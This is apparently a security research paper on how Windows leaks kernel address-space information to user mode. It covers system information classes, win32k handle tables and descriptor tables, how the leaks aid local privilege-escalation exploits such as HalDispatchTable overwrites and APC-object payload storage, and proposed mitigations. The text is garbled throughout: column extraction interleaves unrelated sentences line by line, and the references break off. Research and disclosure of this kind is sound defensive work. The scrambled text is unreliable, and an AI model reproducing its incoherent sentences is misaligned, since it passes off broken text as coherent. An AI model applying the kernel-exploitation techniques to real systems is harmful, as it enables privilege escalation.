certain services implemented by (heap cookies, safe unlinking etc.), a potential attacker. This very approach to mitigate the threats caused by none of the enumeration members drivers (including core Windows ring-0
the broker. While effectively limiting Exception Handling Protection7 is taken by Address Space Layout careless ring-0 address management, has ever been removed from the modules) presently loaded into kernel
the spectrum of potential action (SafeSEH, SEHOP etc.), Data Execution Randomization, which deliberately we conclusively present some steps, service implementation. The avaiable space. Should the service succeed,
which can be taken by the client, Prevention21 and Address Space Layout relocates executable images to random which can be taken by Microsoft to information types include, but are not the output buffer contains a list of
the approach also guarantees Randomization6. The above mitigation locations, thus making it difficult or further eliminate the disclosure of limited to the following items: the SYSTEM_MODULE_INFORMATION
that untrusted code can only do techniques can be divided into three, impossible to build a reliable exploit by sensitive addresses, while retaining structures (see Listing 2).
as much as the system user or general types: using hard-coded addresses. the old functionality. Basic system and machine
developers really intend to (assuming characteristics, Among other items, three structure
a flawless implementation of the Figure 1. A typical design of a client-broker privilege separation scheme The rest of the paper is organized System performance, fields are particularly interesting:
trusted code). A basic model of the as follows. In Section 2, we review Date / Time, Base, Size and ImageName. As their
architecture is presented on Figure 1. Privilege
Separation
the different types of addresses State of processes and threads, names indicate, these fields represent
Operating systems, sandboxing and made available to regular user-
virtualization technologies all make a Controlled Environment High-Integrity Mode mode applications, and what is their Listing 1: NtQuerySystemInformation denition
good example of computer software specific meaning in the operating NTSTATUS
STDCALL
taking advantage of privilege system. In Section 3, we discuss the NtQuerySystemInformation(
separation. usages of the revealed addresses, SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
in terms of practical kernel ULONG SystemInformationLength,
Brokers, as regular pieces of exploitation scenarios. In Section PULONG ReturnLength);
executable code, do suffer from Underlying 4, we propose ways of reducing the
regular software bugs. As a direct Untrusted Code Trusted Code mechanisms impact implied by memory layout Listing 2: Kernel module descriptor
(the client) (the broker) typedef struct _SYSTEM_MODULE_INFORMATION
consequence of communicating and (OS, hardware) information leakages, as well as {
processing data received from less- possible fixes on both hardware ULONG Reserved[2];
PVOID Base;
trusted modules, these bugs might and software level. Finally, in ULONG Size;
often be triggered through a specially Section 5 we provide thoughts and ULONG Flags;
crafted dialogue with one of the Safe Communication suggestions on the future of kernel USHORT Index;
Channel USHORT Unknown;
clients. Furthermore, since some of address information availability, and USHORT LoadCount;
these programming bugs may - and in Section 6 we provide a conclusion USHORT ModuleNameOffset;
CHAR ImageName[256];
often have - security implications, of the paper. } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
the image base (IMAGE_OPTIONAL_ Listing 3: A custom driverquery utility output ERESOURCE Routines17, or specically, A single entry in the handle table Win32k.sys System Call
HEADER.ImageBase), size (IMAGE Name: ntoskrnl.exe, ImageBase: 0x8281c000, ImageSize: 0x003ab000 the ExInitializeResourceLite routine is represented by a HANDLENTRY Information Disclosure
OPTIONAL HEADER. SizeOfImage) Name: hal.dll, ImageBase: 0x82bc7000, ImageSize: 0x00033000 documentation. structure, as shown in Listing 9. As discovered several months prior to
Name: kdcom.dll, ImageBase: 0x8a809000, ImageSize: 0x00007000
and file name of a single kernel Name: PSHED.dll, ImageBase: 0x8a810000, ImageSize: 0x00011000 Among other fields, the phead writing the paper, more then twenty
module. In other words, it is possible Name: BOOTVID.dll, ImageBase: 0x8a821000, ImageSize: 0x00008000 SystemExtendedProcessInformation and pOwner members contain win32k system call handlers were
Name: CLFS.SYS, ImageBase: 0x8a829000, ImageSize: 0x00041000
for any user to create a complete map Name: CI.dll, ImageBase: 0x8a86a000, ImageSize: 0x000e0000
On the Windows platform, the OS the address of the object, and the leaking kernel-mode addresses to
of device driver memory placement [...] allocates two distinct stacks for every handle owner (either an ETHREAD or user-mode through the return value.
across the privileged address space. regular thread: a user- and kernel- EPROCESS pointer). As it later turned out, the information
An exemplary output snippet of Listing 4: HANDLE descriptor mode stack. Intuitively, each of them disclosure was caused by invalid
typedef struct _SYSTEM_HANDLE_INFORMATION {
a simple utility, making use of the ULONG ProcessId; is used within the corresponding As mentioned, it is possible to definitions of the flawed services.
discussed information class, is UCHAR ObjectTypeNumber; privilege level, thus protecting the enumerate the win32k handle Instead of declaring the return value
UCHAR Flags;
presented in Listing 3. USHORT Handle;
more privileged execution flow from table by just operating on the local to have the same bit-width as the
PVOID Object; any ring-3 disruptions. Although not process memory, without resorting native processor word (32 or 64,
It is important to note that Microsoft ACCESS_MASK GrantedAccess; being able to operate on the kernel to a single system call (except for the depending on the platform), the
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
created a documented interface around stack, user-mode code can obtain its one required to convert the program definitions of several system calls
the SystemModuleInformation class, and Listing 5: Extended HANDLE descriptor base address and size through the to a GUI process). Also, as a direct were similar to those presented in
incorporated it into the Process Status typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX { SystemExtendedProcessInformation consequence of the shared section Listing 10 and Listing 11.
PVOID Object;
API15. Namely, the operating system HANDLE UniqueProcessId;
information class. More specifically, scope, one application can list all
supports the following official routines HANDLE HandleValue; the discussed class can be used to objects created within the same Consequently, the compiled routines
to examine information about device ACCESS_MASK GrantedAccess; retrieve very detailed data regarding session. For more information as for would either leave the EAX/RAX
USHORT CreatorBackTraceIndex;
drivers present in kernel-mode: USHORT ObjectTypeIndex; all processes and threads running on how to correctly find and manage register (through which return values
ULONG HandleAttributes; the system (described by the SYSTEM_ the handle table, see Kernel Attacks are passed in STDCALL) unitinialized,
PVOID Reserved;
EnumDeviceDrivers } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *
PROCESS_INFORMATION and SYSTEM_ Through User-Mode Callbacks22. or only initialize the least significant
GetDeviceDriverBaseName PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX; THREAD_INFORMATION together
Listing 7: ERESOURCE descriptor
GetDeviceDriverFileName with SYSTEM_EXTENDED_THREAD_ typedef struct _SYSTEM_LOCK_INFORMATION {
Listing 6: First records of the SystemExtendedHandleInformation output INFORMATION structures, respectively). PVOID Address;
[0]: PID: 0x00000004, Handle: 0x00000004, Object: 0x84a43a90 USHORT Type;
Although the kernel-oriented [1]: PID: 0x00000004, Handle: 0x00000008, Object: 0x8bc58158 USHORT Reserved1;
part of PSAPI only allows to [2]: PID: 0x00000004, Handle: 0x0000000c, Object: 0x8bc13e68 Win32k.sys Object ULONG ExclusiveOwnerThreadId;
[3]: PID: 0x00000004, Handle: 0x00000010, Object: 0x8bc11658
enumerate drivers base addresses [4]: PID: 0x00000004, Handle: 0x00000014, Object: 0x8bc72e38
Handle Addresses ULONG ActiveCount;
ULONG ContentionCount;
and names, it is remarkable that [...] Similarly to the Windows kernel ULONG Reserved2[2];
Microsoft decided to make a part executive, the major graphical device ULONG NumberOfSharedWaiters;
of the SystemModuleInformation object body, referenced by the given values of, for example, 0x0007C driver - win32k - also manages its own ULONG NumberOfExclusiveWaiters;
} SYSTEM_LOCK_INFORMATION, *PSYSTEM_LOCK_INFORMATION;
functionality available to regular HANDLE. Thanks to the functionality, and 0x1007C. In order to avoid per-session handle table for USER and
developers; it might potentially have it becomes possible to enumerate all the problem, we advice to use the GDI handles. The table is initialized in Listing 8: Extended thread descriptor
future consequences in terms of handles managed by the operating SystemExtendedHandleInformation win32k!Win32UserInitialize, and stored typedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION
{
legacy, if the vendor starts making system, including processes with class, together with the SYSTEM_ at the base address of a shared section, SYSTEM_THREAD_INFORMATION ThreadInfo;
efforts towards reducing the kernel privileges higher than the original HANDLE_INFORMATION_EX structure win32k!gpvSharedBase. This section is PVOID StackBase;
PVOID StackLimit;
address accessibility surface. information requestor. (see Listing 5). subsequently mapped into every GUI PVOID Win32StartAddress;
process running in the system, making PVOID TebAddress;
SystemHandleInformation One potential problem related to the In Listing 6, an exemplary output it possible for processes to access ULONG Reserved1;
ULONG Reserved2;
The information class was designed to original HANDLE descriptor structure, snippet of the handlequery utility is the handle table without resorting ULONG Reserved3;
provide general information about all is the fact that the Handle field is presented. to a system call. Mapping the shared } SYSTEM_EXTENDED_THREAD_INFORMATION, *
PSYSTEM_EXTENDED_THREAD_INFORMATION;
HANDLE values (and the associated declared as USHORT, implying 16- section into user-mode memory areas
objects) from all processes present bit storage width. Considering that SystemLockInformation was considered beneficial in terms of Listing 9: Win32k handle table entry
in the system. On output, the caller the handle growth incremental on Upon invoking NtQuerySystemInfor- general system effectiveness, efficiently typedef struct _HANDLEENTRY {
receives an array of the SYSTEM_ Windows is four, and a single process mation with this information class, reducing the number of context and struct HEAD* phead;
VOID* pOwner;
HANDLE_INFORMATION structures can potentially own more than the operating system returns a list privilege switches required to perform UINT8 bType;
(see Listing 4), each maintaining data 16384 handles, the structure lacks of lock descriptors, contained in the graphical operations. UINT8 bFlags;
UINT16 wUniq;
about a single numeric resource ID. the upper 16 bits of numeric handle SYSTEM_LOCK_INFORMATION (see }HANDLEENTRY,*PHANDLEENTRY;
representation. In certain scenarios Listing 7). The locks are otherwise The address of the shared section can
The descriptor contains every relevant - such as using objects to spray the known as ERESOURCE structures, and be obtained by numerous means, e.g. Listing 10: Exemplary win32k service with no return value
HANDLE characteristic, hence making kernel address space - this issue are (only) available to kernel-mode, to by scanning all sections mapped in VOID NtUserRandomService( [...] );
an invaluable source of information. can render the overall technique implement exclusive/shared synchro- the local memory context, or through
Most importantly, the kernel provides useless, by making it impossible nization. For more information about an exported user32!gSharedInfo Listing 11: Exemplary win32k service with a narrow return value type
the requestor with an address of the to distinguish numeric HANDLE the mechanism, see Introduction to symbol (present only on Windows 7). USHORT NtUserRandomService( [...] );
16 bits, leaving the remaining part Listing 12: A typical epilogue of a win32k system call handler present regardless of the current system Listing 13: A pseudo-code GetKernelProcAddress implementation
unchanged. .text:BF853847 call _LeaveCrit@0 state, as they are essential for correct LPVOID GetKernelProcAddress(PCHAR Module, LPCSTR lpProcName)
.text:BF85384C pop esi CPU (Task State Segment), and system {
.text:BF85384D pop ebp HMODULE ModuleHandle;
When no value is explicitly returned, .text:BF85384E retn 0Ch (Processor Control Region) performance. FARPROC ProcPointer;
the actual return value depends on the As previously mentioned, the third if((ModuleHandle = LoadLibraryEx(Module, NULL,
last EAX/RAX register modification, Interrupt Descriptor Table 32 Architectures Software Developers item (9th index) is not initialized by DONT_RESOLVE_DLL_REFERENCES)) == NULL)
return NULL;
prior to leaving the system call. Global Descriptor Table Manual states2: default; it is only created (and remains if((ProcPointer = GetProcAddress(ModuleHandle, lpProcName) == NULL
Hence, it is potentially possible that Local Descriptor Table active throughout the process lifespan) )
{
such an Information Disclosure would SIDT is useful only by operating- upon creating the first LDT entry with a FreeLibrary(ModuleHandle);
reveal stack/heap data or random The Interrupt Descriptor Table consists system software. However, it can dedicated service. return FALSE;
}
kernel memory addresses. As further of 255 entries, each associating an be used in application programs FreeLibrary(ModuleHandle);
investigation showed, the affected exception or interrupt vector with a without causing an exception to be Exploitation Usability return (ProcPointer - ModuleHandle + GetDriverImageBase(Module));
functions epilogues had usually a gate descriptor for the procedure or generated. In this section, we focus on certain }
very similar format, presented in task used to service the associated software vulnerability classes and
Listing 12. exception or interrupt. In order to retrieve the addresses scenarios, in which each of the routines like LoadLibraryEx or attacks assume code execution
of Descriptor Tables for all active disclosed type of address may come GetProcAddress (see Listing 13). by definition; a malicious user is
The internal LeaveCrit function The Global Descriptor Table represents processors or cores, it is necessary to use in handy. usually able to operate within a
initializes EAX/RAX with the address a set of 8-byte entries, each describing the SetThreadAffinityMask API. It is also Since a typical payload would restricted environment (e.g. process,
of the current threads ETHREAD a Code Segment, Data Segment, worth to note, that the SIDT instruction SystemModuleInformation usually take advantage of the or user account). Therefore, it is
structure. Despite this one type of TSS, Call-Gate or LDT. The table is an functionality has already been used in class kernel API to load an arbitrary driver possible to entirely control the user-
address, it is also possible to retrieve essential component of segmentation, the past to detect the presence of VMM Free access to information concerning (nt!ZwLoadDriver) or elevate process mode address space during kernel
a pointer to the local W32THREAD the first step in address translation. It environment, as presented by Joanna all executable images residing within privileges (nt!ZwOpenProcessToken, exploitation. Provided that the
structure, through five routines with also plays an important role in terms Rutkowska in 20045. the boundaries of kernel virtual nt!ZwDuplicateToken and other), it affected kernel routine executes in
a slightly different epilogue. For of privilege separation. Both of the address space makes it a powerful is often best to initialize appropriate the same context as its ring-3 trigger,
more information about the issue, discussed structures have a global GDT Entries tool in numerous exploitation pointers in the pre-exploitation stage. payload can be successfully executed
see Subtle information disclosure in system scope, and once initialized, they In spite of the Global Descriptor contexts. This is primarily caused by This way, any accidential failure at this without the need to control privileged
WIN32K.SYS syscall return values11. almost never change during Windows Table address availability alone, the diversity of data types present point can be cleanly processed while memory areas.
run time. Local Descriptor Table, on Windows also allows to obtain in a single PE file - executable code, still on the ring-3 privilege level.
Even though both kernel-mode the other hand, is a local equivalent and examine particular table function pointers, static variables, Interestingly, in May 2011 Intel
addresses revealed through invalid of GDT. It is an optional structure with entries. The functionality is large arrays, exported symbols - each Return-Oriented Programming announced a new anti-exploitation
return types can also be obtained by per-process scope, which can be set operable through a documented of which represents a certain value, Return-Oriented Programming - technology called Supervisor Mode
other means, this behavior is strictly up by the kernel on demand26. GetThreadSelectorEntry function, depending on a given vulnerability previously known as ret2libc - is a Execution Protection, implemented on
conincidental, and the operating which is internally implemented using characteristics. common exploitation technique, the CPU level3,4. The general concept
system developers are very unlikely The Interrupt and Global Descriptor NtQueryInformationThread together capable of circuvmenting the Data of the upcoming feature is to refuse
to have any control over the nature of Tables are localized through virtual with the ThreadDescriptorTableEntry Pre-exploitation payload Execution Prevention mitigation ring-0 execution of code located in
the disclosed information. Therefore, addresses. These addresses are information class. initialization technology in certain scenarios. The memory pages marked as accessible
the current low impact of such subtle stored in dedicated registers The official user-mode Windows API method requires a controlled stack from user-mode, upon setting the
leakages might grow up to a serious called IDTR and GDTR, respectively. Since the operating system puts no interface is split into tens of separate (as a consequence of a typical stack 20th bit in the CR4 register. Security
problem in the future, especially in Write access to these registers is limitation on the segment selectors libraries, such as kernel32.dll, user32.dll, buffer overflow, or upon crafting researchers have already presented
case of steps being taken to reduce accomplished through privileged being queried or the completness and so on, depending on the nature and the stack pointer), and relies on a possible ways of subverting the
the amount of kernel address space LIDT (Load IDT) and LGDT (Load GDT) of GDT information, it is possible functionality of a certain function set. chained execution of tiny assembly protection on both Linux1 and
information available to unprivileged instructions. Trying to execute one to scan the overall table, collecting As opposed to ring-3, a great majority code snippets (referred to as gadgets, Windows14 platforms.
applications. of them within a higher ring results kernel-mode addresses. Table 1 (see of documented Windows kernel API ending with execution-control
in an immediate #GP(0) exception. a complete version of the table13) is located inside the primary OS core - instructions, such as RETN). In most When code execution from user-
Descriptor Tables On the other hand, reading the presents entries containing kernel- ntoskrnl.exe (or its equivalent); while cases, exploits make use of gadgets mode memory is rendered impossible,
In this section, we review the types registers values is not restricted by mode base addresses. As the table the other part (such as KeRaiseIrql) residing in executable images Return Oriented Programming might
and ways of reaching kernel addresses any means, and can be achieved shows, GDT contains a total of three resides in HAL.DLL. loaded in the local address space, turn out to become a feasible way
related to Descriptor Tables, a crucial through corresponding SIDT and entries, which might prove useful for thus the technique is considered a of exploiting local Windows kernel
part of the Intel x86 and x86-64 CPU SGDT instructions. As Intel 64 and IA- a potential attacker. The first two are Thanks to such design, it becomes sophisticated form of code reuse. vulnerabilities. Should it happen, the
architecure, on the Windows platform. possible to obtain the virtual address ability to retrieve base addresses of
Table 1. Kernel-mode entries in a typical Windows Global Descriptor Table of any Windows kernel routine, being Taking advantage of techniques such PE images present in ring-0 would
SIDT, SGDT Index Type Base Limit DPL Notes part of the documented DDK API. The as ROP is usually motivated with be a crucial part of the exploitation
Every Intel-architecture processor (or 5 tss 80042000 20AB 0 Task State Segment (per-processor) task can be achieved, by combining the lack of control over the vulnerable process. What is even more, as long as
a single core) makes extensive use of 6 data FFDFF000 FFF 0 Windows Processor Control Region (per-processor) SystemModuleInformation functionality process address space. On the the device driver layout is available to
three Descriptor Tables: 9 ldt 86811000 7 0 optional custom LDT (per-process) with popular image management other hand, Elevation of Privilege untrusted entities, no anti-exploitation
measure can stop the attacker from What-Where condition, including Payload storage applied to the stack by default. This Additionally, the kernel stack can play and W32THREAD. The first one is
taking over the machine, once the optimized switch branch tables, Depending on the object design and differs from kernel-mode DEP on the role of a data container9. This is equivalent to the current threads
kernel stack is controlled. static function pointers or dispatch purpose, user-mode applications 64-bit versions of Windows, where made possible thanks to the fact, that object address, which can be read
tables. For as long as device drivers may have a varying degree of control the stack, paged pool, and session several Windows services allow an using SystemHandleInformation; the
Static function pointers image bases are not protected from over the objects structure contents. pool have DEP applied. extensive amount of user-mode bytes second one is accessible through
Amongst other classes of kernel unathorized access, the exploitation Remarkably, several objects (such to be moved to a local stack buffer (up the local Thread Environment Block
security flaws, the Write-What-Where of a majority of ring-0 security flaws as APC Reserve Objects10) allow as Kernel Pool Feng Shui to 4096 bytes). Since all kernel stacks structure. The possible applications
condition is one of the most common, will remain trivial. much as sixteen bytes of controlled Analogically to other types of are allocated from non-pageable of a thread object are discussed in the
and easiest to take advantage of. It memory placed within the object computer software (e.g. web browsers) memory, the above behavior can adequate section, while considering
can occur as a direct consequence of SystemHandleInformation body. Because of the unlimited access allowing attacker-controlled code be made use of in most scenarios the fact that the latter structure is
insufficient input pointer validation, class to object address information, it is execution (e.g. javascript) and partial scenario, regardless of the vulnerable undocumented and hardly explored,
an implicit result of a pool-based The availability of information about potentially possible to use the objects control over the internal state of the code IRQL. we believe it to be unsuitable for
buffer over flow, and in several other objects with assigned numeric as an effective kernel-mode payload brokers memory allocator (user-mode kernel exploitation purposes.
circumstances (e.g. referencing identifiers (handles) makes a great container (see Figure 2). heap), the Windows kernel also makes Generally speaking, the availability of
pointers from the NULL memory source of data regarding the current it possible for unprivileged application kernel-mode stack bases is not only IDT, GDT and LDT
page). As the name indicates, the operating system state. Furthermore, One disadvantage of the proposed to affect the pools (an equivalent of useful in terms of generic exploitation, All of the three primary Descriptor
condition allows unprivileged code due to the nature and complexity of technique is the fact that the user- ring-3 heaps) layout. This particular but also turns out to be of great value Tables consist of bytes representing
to write a controlled value (what) into some of the object types, it is often controlled shellcode is located inside capability can prove especially useful, while evaluating more peculiar types virtual addresses and privilege
user-controlled kernel address (where). feasible to use them as a direct post- the kernel pool areas, which are when dealing with the Use-after-free of issues, which are highly dependent level indicators. Consequently, they
exploitation stager. marked as non-executable. Fortunately, vulnerability class. Moreover, crafting a on the stack itself (e.g. uninitialized make an excellent target for Write-
In most scenarios, the condition can APC Reserve Objects (as well as a specic allocations layout has also been local variable dereferences). What-Where attacks. Several ways of
be observed in a four-byte (or eight Write-What-Where condition majority of Windows objects) are shown to come in handy, in terms of altering the GDT and LDT structures
for Intel x86-64) form, i.e. it is possible Similarly to executable modules, allocated from Non-Paged Pool which circuvmenting new kernel security Win32k.sys shared sections have been described in the GDT and
to write an operand sized the same some object structures abound in - according to MSDN16 - is excluded features introduced in Windows 7, By mapping the win32k.sys shared LDT in Windows kernel exploitation
as the native CPU word. In order to execution critical fields, which might from the DEP protection layer: such as Safe-Unlinking18,23. section into user-mode, the graphical paper13, while a number of other ways
turn the condition into privileged be picked out during a Write-What- module makes all (session-wide) of poking with the Protected Mode
code execution, it is necessary to Where condition exploitation. A list of DEP is also applied to drivers in Although little research has been user/gdi objects addresses visible to tables are believed to exist.
overwrite a value, which (directly or potential object types includes Timers kernel mode. DEP for memory performed in the field of precise regular applications. Although the
implicitly) affects the kernel execution (KTIMER), Threads (KTHREAD), or APC regions in kernel mode cannot be kernel pools control, we believe that information leakage doesnt have TSS, PCR
path. Extensive research has been Reserve Objects (KAPC structure, selectively enabled or disabled. On the subject will become an important any direct security implications, a As a direct outcome of the fact that
performed in this field25,20, resulting Listing 14)12. 32-bit versions of Windows, DEP is point of security researchers interest, recent research on a new win32k. particular GDT entries can be queried
in the invention of several effective as new anti-exploitation technologies sys vulnerability vector user-mode by user-mode code, they could be
ideas. One of the most widely known Listing 14: Asynchronous Procedure Call descriptor are introduced in the Windows kernel. callbacks has shown that it can also potentially used to elevate the
technique, is to overwrite a function nt!_KAPC heavily simplify the exploitation of users privilege level. In regard to TSS,
pointer, located at a constant offset +0x000 Type : Int2B
+0x002 Size : Int2B
SystemLockInformation the Use-after-free vulnerability class. vulnerable ring-0 code could be used
relative to an exported kernel symbol: +0x004 Spare0 : Uint4B No attacks or exploitation techniques to overwrite parts of the CPU context
nt!HalDispatchTable + sizeof(ULONG_ +0x008 Thread : Ptr32 _KTHREAD related to the ERESOURCE structure Since the type of information revealed (such as SegCs or EFLAGS.IOPL), or
+0x00c ApcListEntry : _LIST_ENTRY
PTR). Upon replacing the original +0x014 KernelRoutine : Ptr32 void addresses are publicly known. Because by the memory mapping is analogous modify the I/O Access Bit Mask in such
value with the payload virtual +0x018 RundownRoutine : Ptr32 void of the fact that the Lock synchronization to the SystemHandleInformation class, a way, that direct I/O communication
+0x01c NormalRoutine : Ptr32 void
address, privileged code execution +0x020 NormalContext : Ptr32 Void mechanism is only operable from ring- these two information disclosure with the machine components are
can be then triggered through the +0x024 SystemArgument1 : Ptr32 Void 0, we consider the information class cases represent a similar degree of available from within user-mode.
NtQueryIntervalProfile service, which +0x028 SystemArgument2 : Ptr32 Void
+0x02c ApcStateIndex : Char
hardly applicable in the context of usability. The objects managed by
invokes the following call stack: +0x02d ApcMode : Char Elevation of Privileges attacks. kernel-mode Windows subsystem Mitigations
+0x02e Inserted : UChar are also believed to be applicable In this section, we evaluate ways
nt!NtQueryIntervalProfile Figure 2. Exemplary KAPC structure chain, storing 33 bytes of payload in three chunks of data
Kernel-mode stacks in Write-What-Where and Kernel of mitigating the threats incurred
nt!KeQueryIntervalProfile As the kernel-mode stack is a crucial memory spraying attacks. No specific by information disclosure issues
[nt!HalDispatchTable +
1st Reserve Object 2nd Reserve Object 3rd Reserve Object Non-Paged Pool part of the ring-0 execution path, advantages of using win32k.sys described in Section 2.
sizeof(ULONG_PTR)] it is a perfect candidate for a Write- mechanisms instead of the Windows
What-Where condition target. Having kernel ones are known to the authors. Windows Kernel Information
In general, device driver images structures like KTRAP_FRAME or stack Classes
11 payload bytes 11 payload bytes 11 payload bytes NormalRoutine
contain a tremendous amount NormalContext frames located within a given threads Win32k.sys return values Due to the fact that the
SystemArgument1
of critical spots (such as function SystemArgument2 privileged stack, it is possible to hijack At the time of writing this paper, NtQuerySystemInformation classes,
pointers), which can be used to ring-0 execution by overwriting a it is possible to only obtain the revealing kernel address space
compromise a machine through JMP $ + (2nd offset) JMP $ + (3rd offset) JMP $ return-address, saved CS: register within addresses of two structures, assigned information, were implemented
vulnerable kernel code and a Write- the trap frame, or other sensitive data. to the current thread: KTHREAD purposedly and as a feature, they
cannot be thought of as regular administrative privileges imply the Win32k.sys Handle Table memory pages. Namely, Intel has their base addresses, which would starting from well-documented
vulnerabilities. In order to reduce ability to load arbitrary device drivers. information added a new bit called SMEP-enable in make it possible for a debugger to WinAPI routines, up to incomplete
the potential security impact of As previously mentioned, the situation As mentioned before, the address the CR4 register (only controllable by operate on linear, virtual addresses. return values of graphical system calls.
their functionality, we propose four is roughly different on the 64-bit space information leakage related to the operating system). Upon setting Due to the fact that user-mode code We believe that the current situation
solutions which we believe might be Windows editions, where only digitally win32k.sys is a direct consequence the flag, the execution of CPL=0 from can only reference memory within is primarily caused by the fact that
successfully adopted by Microsoft. signed modules can be loaded into of the current Windows USER/GDI memory write-able from CPL=3 causes user-mode addressing boundaries, Microsoft has not had any official
kernel space, unless another option implementation, and numerous an exception to be generated. the real APIs functionality ends on policy concerning the disclosure of
1. Sustain the overall information was chosen during the system boot efficiency optimizations present ring-3 segments (most often, the FS: kernel-related information for years of
classes functionality, except for filling process. Therefore, the discussed therein. The only possible way of If CR4.SMEP = 1, instructions may segment translation, being the only the system development. Since local
the individual fields, containing method can be considered even more obstructing access to graphical be fetched from any linear address standard segment with base address kernel attacks were rarely observed
kernel-mode information. The restrictive than the previous one. objects address information would with a valid translation for which other than zero). and reported in the past, there was no
concept could be implemented be to entirely re-design the current the U/S ag (bit 2) is 0 in at least need to establish any rules on what
relatively easily in the context of 4. Entirely cut out the unsafe windowing architecture, and one of the paging-structure entries Considering the circumstances, we and where kernel addresses could be
undocumented services; however, functionality from the system implement parts of several crucial controlling the translation. advice that the allowed output of passed down to user-mode. As ring-
taking such a step would also render information service, returning system modules (user32.dll, win32k. the API function should be reduced 0 security is continuously gaining
the device driver-oriented part of the STATUS_NOT_IMPLEMENTED in sys) from the very beginning. We suggest adding an analogous to entries with the DPL field set more attention from the security
PSAPI interface useless, as it is mostly response to any of the four requests Because of the complexity and flag, controlling the availability of to 3. In a more general scenario, professionals, it now becomes
based on image base addresses. regarding kernel address space potential difficulties related to such IDT and GDT addresses in user-mode, the ThreadDescriptorTableEntry important to state the formal rules,
information. an operation, it is highly unlikely into the CR4 register. Such a bit (e.g. information class (which and fix the numerous architectural
2. Restrict the access to certain that Microsoft will take such a step in CR4.DTAP, as in Descriptor Table GetThreadSelectorEntry is based on) errors introduced thorough the
information classes, by introducing All of the above suggestions assume existing Windows editions. However, Address Protection) would prevent would be re-implemented so that years of Windows NT development.
an additional check on the current more restrictive requirements we believe that it might be feasible non-privileged code from obtaining it is allowed to only return entries, Although it is clear that kernel address
process security token (e.g. a concerning the availability of several to apply several major improvements the tables addresses, when set; whose DPL is greater or equal to the space protection is not an ultimate
SeTcbPrivilege requirement). types of information. Although each to the current graphical design in the the original CPU behavior would previous mode CPL. Thanks to such remedy to successful exploitation of
Consequently, only programs of them would result in the desired upcoming Windows platforms, as it not be affected otherwise. Such a approach, device drivers would still be device driver vulnerabilities, it is a big
with administrative rights would effect, the real problem is legacy and suffers from other severe architectural solution would allow the system able to make use of kernel segment step in terms of overall system security
be allowed to query for sensitive cross-system compatibility. Formally, problems and issues, as presented by developers to assess the benefits information, while preventing regular reformation. Remarkably, the Linux
kernel information, while making Microsoft could modify the behavior Tarjei Mandt22. and risks related to the Descriptor applications from requesting the data. kernel developers seem to follow the
it impossible for restricted users to of internal, undocumented classes Tables address accessibility, and basic rules of kernel address space
obtain any of the classified data. as long as it would not interfere with Interrupt and Global choose a corresponding setting. Miscellaneous address leaks information security, as Information
the vendors user-mode applications. Descriptor Table Currently, we are not aware of any In spite of kernel address space Disclosure vulnerabilities of that kind
One major disadvantage of the As it turns out, however, it is very The information disclosure accessible measures, which could be taken by information available through are usually treated seriously, and
method is the fact that even though likely that some third-party Windows through the SIDT and SGDT Microsoft to address the problem documented and undocumented patched within a reasonable period
it would successfully decrease the applications would cease to work instructions is entirely a matter of the on a software level. services or certain system architecture of time.
amount of data during an Elevation after applying the proposed security CPU architecture, and is completely characteristics, unintended leakages
of Privileges attack, it would still be enhancements. This, in turn, might unrelated to the operating system GDT entries of information have also been shown Conclusion
feasible to attack a 64-bit kernel cause problems much more serious intricacies (e.g. it works the same way At the time of writing this paper, all to occur. Although eliminating all In this paper, we have discussed
as a privileged user (administrator), that the benefits of a potentially on the Windows and Linux platforms). GDT and LDT items can be retrieved information disclosure issues is very the many ways of retrieving kernel
in order to load an unsigned driver increased kernel security level. Accordingly, the problem must be by every application, through the unlikely, we are certain that operating space addresses of various, internal
into kernel space (a.k.a. admin-to- dealt with on the hardware level. GetThreadSelectorEntry API. As the system vendors, or specically system components. Furthermore,
kernel escalation, or Driver Signature What is more, one of the functions documentation (Remarks Microsoft, need to take such bugs we have shown how to practically
Enforcement bypass). blamed information classes - Although very intuitive and section) states: seriously and fix them accordingly. implement each of the presented
SystemModuleInformation - is presumably easy to implement, techniques, and how most of them
3. Similarly, limit access to sensitive currently utilized as a part of a moving the two discussed instructions Debuggers use this function to Remarks can be successfully employed during
classes by ensuring that only ring- documented interface, called PSAPI. into the privileged group would convert segment-relative addresses As we have shown in the paper, a local Elevation of Privileges attack.
0 callers (i.e. kernel modules) can This fact makes it even harder for the probably not be the best option, due to linear virtual addresses. Windows kernel address space In order to make it significantly
obtain information regarding kernel OS developers to make any move, since to legacy reasons. Instead, we believe The ReadProcessMemory and information is an invaluable source harder to make of kernel-mode
addresses. The task could be successfully meddling in an official, established that the CPU would ideally leave the WriteProcessMemory functions use of data, making the exploitation of security flaws, we conclusively
accomplished by examining the system interface is not a desirable spot. decision of whether SIDT and SGDT linear virtual addresses. ring-0 vulnerabilities reliable, and suggested several mitigation
PreviousMode value, which represents All things considered, we believe that should be available to user-mode or relatively easy for a potential, local techniques and concepts, which
the CPL of code running previous to the the real future of the awkward system not, to the operating system itself. The function was primarily designed attacker. This kind of information could be used to reduce the address
NtQuerySystemInformation system call. information service will depend on to translate segment selectors into can be obtained in a variety of ways, space information surface.
the application compatibility extent A similar approach was taken in terms
The solution is equivalent to the first Microsoft is willing to give away in lieu of protecting ring-0 execution flow
concept on 32-bit platforms, where of kernel address space secrecy. from being redirected into user-mode
>>REFERENCES
1. Dan Rosenberg: SMEP: What is It, and How to Beat It on Linux. http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux/.
2. Intel: Intel 64 and IA-32 Architectures Software Developers Manual, Volume 2B. Intel Corporation, 2007.
3. Intel: Intel 64 and IA-32 Architectures Software Developers Manual, Volume 3A, 2.5 Control Registers. Intel Corporation, 2011.
4. Joanna Rutkowska: From Slides to Silicon in 3 years! http://theinvisiblethings.blogspot.com/2011/06/ from-slides-to-silicon-in-3-years.html.
5. Joanna Rutkowska: Red Pill... or how to detect VMM using (almost) one CPU instruction. http://invisiblethings.org/papers/ redpill.html.
einvisiblethings.blogspot.com/2011/06/ from-slides-to-silicon-in-3-years.html.
6. Matt Miller, MSEC Security Science: On the eectiveness of DEP and ASLR. http://blogs.technet.com/b/srd/archive/2010/12/ 08/on-the-effectiveness-
